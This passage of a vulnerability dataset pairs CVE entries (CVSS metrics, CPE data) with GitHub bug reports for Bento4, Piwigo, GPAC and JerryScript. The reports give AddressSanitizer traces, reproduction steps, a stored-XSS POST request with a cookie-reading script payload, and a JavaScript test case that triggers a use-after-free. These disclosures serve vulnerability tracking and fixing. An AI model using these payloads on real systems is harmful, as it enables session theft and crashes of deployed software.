AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #33 0x55719b15161d in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #34 0x55719b151080 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #35 0x55719b1eb610 in AP4_TrakAtom::AP4_TrakAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4TrakAtom.cpp:165 #36 0x55719b143429 in AP4_TrakAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/wulearn/Bento4/build/mp4dump+0x324429) #37 0x55719b14063f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:413 #38 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #39 0x55719b15161d in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #40 0x55719b151080 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #41 0x55719b189a6c in AP4_MoovAtom::AP4_MoovAtom(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/wulearn/Bento4/Source/C++/Core/Ap4MoovAtom.cpp:80 #42 0x55719b1433bb in AP4_MoovAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) (/home/wulearn/Bento4/build/mp4dump+0x3243bb) #43 0x55719b1404b8 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:393 #44 0x55719b13e5ee in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #45 0x55719b13dbbd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154 #46 0x55719b130115 in main /home/wulearn/Bento4/Source/C++/Apps/Mp4Dump/Mp4Dump.cpp:342 #47 0x7f73f28540b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #48 0x55719b12e8ed in _start (/home/wulearn/Bento4/build/mp4dump+0x30f8ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ../../../../src/libsanitizer/asan/asan_mapping.h:396 in AddressIsPoisoned ==2476501==ABORTING ``` poc: [poc.zip](https://github.com/axiomatic-systems/Bento4/files/8647385/poc.zip) Thanks!
SEGV on unknown address 0x000000000000 in /Source/C++/Core/Ap4DataBuffer.cpp:175
https://api.github.com/repos/axiomatic-systems/Bento4/issues/708/comments
0
2022-05-08T16:25:44Z
2022-05-08T16:25:44Z
https://github.com/axiomatic-systems/Bento4/issues/708
1,228,929,453
708
CVE-2022-31285
2022-06-10T18:15:08.820
An issue was discovered in Bento4 1.2. The allocator is out of memory in /Source/C++/Core/Ap4Array.h.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/702" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.2:*:*:*:*:*:*:*", "matchCriteriaId": "F7A3D679-CF47-47D3-AED0-94803AC18598", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/702
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
SUMMARY: AddressSanitizer: allocator is out of memory in /Source/C++/Core/Ap4Array.h:172 - Version ``` $ ./mp42hls MP4 To HLS File Converter - Version 1.2 (Bento4 Version 1.6.0.0) (c) 2002-2018 Axiomatic Systems, LLC ``` branch [d02ef82](https://github.com/axiomatic-systems/Bento4/commit/d02ef8230a8fee4904a750eb912521c5f1c74e0b) - Platform ``` $ gcc --version gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0 Copyright (C) 2019 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. $ uname -r 5.13.0-40-generic $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.4 LTS Release: 20.04 Codename: focal ``` - Steps to reproduce ``` $ mkdir build $ cd build $ cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" $ make $ ./mp42hls poc ``` - Asan ``` $ ./mp42hls poc ================================================================= ==2569847==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x64f7ff3b0 bytes #0 0x7f4dacc42587 in operator new(unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:104 #1 0x55b48862ff7c in AP4_Array<AP4_TrunAtom::Entry>::EnsureCapacity(unsigned int) (/home/wulearn/Bento4/build/mp42hls+0x40af7c) #2 0x55b48862fcf0 in AP4_Array<AP4_TrunAtom::Entry>::SetItemCount(unsigned int) /home/wulearn/Bento4/Source/C++/Core/Ap4Array.h:210 #3 0x55b48862e470 in AP4_TrunAtom::AP4_TrunAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /home/wulearn/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:127 #4 0x55b48862de8a in AP4_TrunAtom::Create(unsigned int, AP4_ByteStream&) /home/wulearn/Bento4/Source/C++/Core/Ap4TrunAtom.cpp:51 #5 0x55b4885751ab in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:438 #6 0x55b488572f7a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #7 0x55b488572549 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154 #8 0x55b4885a3392 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/wulearn/Bento4/Source/C++/Core/Ap4File.cpp:104 #9 0x55b4885a2fe0 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/wulearn/Bento4/Source/C++/Core/Ap4File.cpp:78 #10 0x55b48855db38 in main /home/wulearn/Bento4/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:1894 #11 0x7f4dac6190b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) ==2569847==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan_new_delete.cc:104 in operator new(unsigned long) ==2569847==ABORTING ``` poc: [poc.zip](https://github.com/axiomatic-systems/Bento4/files/8646733/poc.zip) Thanks!
allocator is out of memory in /Source/C++/Core/Ap4Array.h:172
https://api.github.com/repos/axiomatic-systems/Bento4/issues/702/comments
0
2022-05-08T09:35:50Z
2022-05-08T09:35:50Z
https://github.com/axiomatic-systems/Bento4/issues/702
1,228,840,395
702
CVE-2022-31287
2022-06-10T18:15:08.900
An issue was discovered in Bento4 v1.2. There is an allocation size request error in /Ap4RtpAtom.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/703" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.2:*:*:*:*:*:*:*", "matchCriteriaId": "F7A3D679-CF47-47D3-AED0-94803AC18598", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/703
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
SUMMARY: AddressSanitizer: requested allocation size 0xfffffffffffffffd in /Source/C++/Core/Ap4RtpAtom.cpp:49 - Version ``` $ ./mp42hls MP4 To HLS File Converter - Version 1.2 (Bento4 Version 1.6.0.0) (c) 2002-2018 Axiomatic Systems, LLC ``` branch [d02ef82](https://github.com/axiomatic-systems/Bento4/commit/d02ef8230a8fee4904a750eb912521c5f1c74e0b) - Platform ``` $ gcc --version gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0 Copyright (C) 2019 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. $ uname -r 5.13.0-40-generic $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.4 LTS Release: 20.04 Codename: focal ``` - Steps to reproduce ``` $ mkdir build $ cd build $ cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address -g" -DCMAKE_C_FLAGS="-fsanitize=address -g" -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" -DCMAKE_MODULE_LINKER_FLAGS="-fsanitize=address" $ make $ ./mp42hls poc ``` - Asan ``` $ ./mp42hls poc ================================================================= ==2656357==ERROR: AddressSanitizer: requested allocation size 0xfffffffffffffffd (0x800 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0) #0 0x7f94774c8787 in operator new[](unsigned long) ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 #1 0x55c100eee930 in AP4_RtpAtom::AP4_RtpAtom(unsigned int, AP4_ByteStream&) /home/wulearn/Bento4/Source/C++/Core/Ap4RtpAtom.cpp:49 #2 0x55c100e75f4d in AP4_RtpAtom::Create(unsigned int, AP4_ByteStream&) (/home/wulearn/Bento4/build/mp42hls+0x352f4d) #3 0x55c100e744da in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:689 #4 0x55c100e70f7a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #5 0x55c100e70549 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/wulearn/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154 #6 0x55c100ea1392 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/wulearn/Bento4/Source/C++/Core/Ap4File.cpp:104 #7 0x55c100ea0fe0 in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/wulearn/Bento4/Source/C++/Core/Ap4File.cpp:78 #8 0x55c100e5bb38 in main /home/wulearn/Bento4/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:1894 #9 0x7f9476e9f0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) ==2656357==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: allocation-size-too-big ../../../../src/libsanitizer/asan/asan_new_delete.cc:107 in operator new[](unsigned long) ==2656357==ABORTING ``` poc: [poc.zip](https://github.com/axiomatic-systems/Bento4/files/8646736/poc.zip) Thanks!
requested allocation size 0xfffffffffffffffd in /Source/C++/Core/Ap4RtpAtom.cpp:49
https://api.github.com/repos/axiomatic-systems/Bento4/issues/703/comments
0
2022-05-08T09:38:48Z
2022-05-08T09:38:48Z
https://github.com/axiomatic-systems/Bento4/issues/703
1,228,840,962
703
CVE-2021-40678
2022-06-14T13:15:07.937
In Piwigo 11.5.0, there exists a persistent cross-site scripting in the single mode function through /admin.php?page=batch_manager&mode=unit.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1476" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:11.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "B6BC6DF8-D938-4413-B4C7-132BCC938E68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1476
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
**Description:** In the single mode function of the Piwigo system, modifying the author parameter of the picture can cause persistent cross-site scripting **Vulnerable Instances:** /admin.php?page=batch_manager&mode=unit ![image](https://user-images.githubusercontent.com/49687778/132269709-b5092ef5-eac5-4aa2-808d-ccc6df8dbbfc.png) **affected source code file** ![image](https://user-images.githubusercontent.com/49687778/132156810-58decaa0-52cf-4e74-a02a-cdd58e6de823.png) **request** ``` POST /admin.php?page=batch_manager&mode=unit HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 152 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/admin.php?page=batch_manager&mode=unit Cookie: pwg_id=mof6jca30q9tr1qu48hhvqi143 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 element_ids=4&name-4=test&author-4=11111%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E11&date_creation-4=&level-4=0&description-4=&submit=Submit ``` ![image](https://user-images.githubusercontent.com/49687778/132154568-3ca82632-6ac5-4200-89a6-db84651159ed.png) **suggestion** Restrict user input and output
Persistent Cross Site Scripting in Batch Manager(version:11.5.0)
https://api.github.com/repos/Piwigo/Piwigo/issues/1476/comments
0
2021-09-06T02:58:29Z
2021-09-07T01:10:19Z
https://github.com/Piwigo/Piwigo/issues/1476
988,691,714
1,476
CVE-2021-41458
2022-06-16T10:15:09.053
In GPAC MP4Box v1.1.0, there is a stack buffer overflow at src/utils/error.c:1769 which leads to a denial of service vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1910" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:mp4box:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "AAC8DC7B-40A5-4CE7-B534-D17901AECE66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1910
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Step to reproduce: 1.get latest commit code (GPAC version 1.1.0-DEV-rev1216-gb39aa09c0-master) 2.compile with --enable-sanitizer 3.run MP4Box -add poc.nhml -new new.mp4 Env: Ubunut 20.04 , clang 12.0.1 ASAN report [poc.zip](https://github.com/gpac/gpac/files/7122969/poc.zip) ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==344428==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7fcb7d118779 bp 0x7ffe1832c550 sp 0x7ffe1832c480 T0) ==344428==The signal is caused by a READ memory access. ==344428==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used. #0 0x7fcb7d118779 in gf_blob_get /home/lly/pro/gpac_asan/src/utils/error.c:1769:12 #1 0x7fcb7d0eb2ea in gf_fileio_from_blob /home/lly/pro/gpac_asan/src/utils/os_file.c:1287:13 #2 0x7fcb7d0eb2ea in gf_fopen_ex /home/lly/pro/gpac_asan/src/utils/os_file.c:1314:14 #3 0x7fcb7dc90328 in nhmldmx_send_sample /home/lly/pro/gpac_asan/src/filters/dmx_nhml.c:1101:9 #4 0x7fcb7dc90328 in nhmldmx_process /home/lly/pro/gpac_asan/src/filters/dmx_nhml.c:1341:7 #5 0x7fcb7dbbc997 in gf_filter_process_task /home/lly/pro/gpac_asan/src/filter_core/filter.c:2441:7 #6 0x7fcb7db9e965 in gf_fs_thread_proc /home/lly/pro/gpac_asan/src/filter_core/filter_session.c:1664:3 #7 0x7fcb7db9de60 in gf_fs_run /home/lly/pro/gpac_asan/src/filter_core/filter_session.c:1901:2 #8 0x7fcb7d6bf708 in gf_media_import /home/lly/pro/gpac_asan/src/media_tools/media_import.c:1486:2 #9 0x526ea9 in import_file /home/lly/pro/gpac_asan/applications/mp4box/fileimport.c:1289:7 #10 0x4eb996 in do_add_cat /home/lly/pro/gpac_asan/applications/mp4box/main.c:4257:10 #11 0x4e7d46 in mp4boxMain /home/lly/pro/gpac_asan/applications/mp4box/main.c:5746:13 #12 0x7fcb7c9400b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #13 0x429a4d in _start (/home/lly/pro/gpac_asan/bin/gcc/MP4Box+0x429a4d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/lly/pro/gpac_asan/src/utils/error.c:1769:12 in gf_blob_get ==344428==ABORTING ```
SEGV on unknown address in MP4Box at src/utils/error.c:1769 in gf_blob_get
https://api.github.com/repos/gpac/gpac/issues/1910/comments
0
2021-09-07T16:19:06Z
2021-09-09T13:04:24Z
https://github.com/gpac/gpac/issues/1910
990,148,297
1,910
CVE-2021-41682
2022-06-20T14:15:08.947
There is a heap-use-after-free at ecma-helpers-string.c:1940 in ecma_compare_ecma_non_direct_strings in JerryScript 2.4.0
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4747" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "1E97C345-3992-457E-928D-05A0B97B2A5F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/4747
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 3bcd48f ###### Build platform Ubuntu 20.04.2 LTS (Linux 5.11.0-25-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --stack-limit=20 ``` ###### Test case ``` var a = new Int32Array(256); try { a.sort(function() { var o = new Proxy(this, { has: print, get: function() { a = true; return 30; } }); var result = ""; for (var p in o) result += o[p]; }); assert(false); } catch (e) { assert(e instanceof TypeError); } ``` ###### Output ``` [object Object] gc [object Object] print [object Object] resourceName [object Object] createRealm [object Object] a ================================================================= ==31426==ERROR: AddressSanitizer: heap-use-after-free on address 0xf50009d4 at pc 0x5666cddf bp 0xffd046c8 sp 0xffd046b8 READ of size 4 at 0xf50009d4 thread T0 #0 0x5666cdde in ecma_compare_ecma_non_direct_strings /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:1940 #1 0x5666cdde in ecma_string_compare_to_property_name /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:1809 #2 0x5668600f in ecma_property_hashmap_find /home/jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c:396 #3 0x56677d38 in ecma_find_named_property /home/jerryscript/jerry-core/ecma/base/ecma-helpers.c:693 #4 0x566c34f9 in ecma_op_object_find_own /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:701 #5 0x566c3a26 in ecma_op_object_find /home/jerryscript/jerry-core/ecma/operations/ecma-objects.c:850 #6 0x56795f09 in ecma_op_object_bound_environment_resolve_reference_value /home/jerryscript/jerry-core/ecma/operations/ecma-reference.c:238 #7 0x567967b0 in ecma_op_resolve_reference_value /home/jerryscript/jerry-core/ecma/operations/ecma-reference.c:387 #8 0x56737821 in vm_loop /home/jerryscript/jerry-core/vm/vm.c:1098 #9 0x5675555e in vm_execute /home/jerryscript/jerry-core/vm/vm.c:5231 #10 0x56755bf1 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5338 #11 0x567348f1 in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:305 #12 0x56641ca6 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:592 #13 0x5663a132 in main /home/jerryscript/jerry-main/main-jerry.c:173 #14 0xf75c5ee4 in __libc_start_main (/lib32/libc.so.6+0x1eee4) #15 0x56639324 in _start (/home/jerryscript/build/bin/jerry+0x1d324) 0xf50009d4 is located 4 bytes inside of 20-byte region [0xf50009d0,0xf50009e4) freed by thread T0 here: #0 0xf79c8814 in __interceptor_free (/lib32/libasan.so.5+0x113814) #1 0x566ec245 in jmem_heap_free_block_internal /home/jerryscript/jerry-core/jmem/jmem-heap.c:477 #2 0x566ec384 in jmem_heap_free_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:691 #3 0x56755e06 in ecma_dealloc_string_buffer /home/jerryscript/jerry-core/ecma/base/ecma-alloc.c:236 #4 0x56669ddb in ecma_destroy_ecma_string /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:1011 #5 0x566698c7 in ecma_deref_ecma_string_non_direct /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:949 #6 0x56674f32 in ecma_free_value /home/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:1140 #7 0x5673251e in vm_stack_context_abort /home/jerryscript/jerry-core/vm/vm-stack.c:154 #8 0x567338fc in vm_stack_find_finally /home/jerryscript/jerry-core/vm/vm-stack.c:460 #9 0x56753a8a in vm_loop /home/jerryscript/jerry-core/vm/vm.c:4899 #10 0x5675555e in vm_execute /home/jerryscript/jerry-core/vm/vm.c:5231 #11 0x56755bf1 in vm_run /home/jerryscript/jerry-core/vm/vm.c:5338 #12 0x566b6029 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1130 #13 0x566b6d44 in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1370 #14 0x56696f43 in 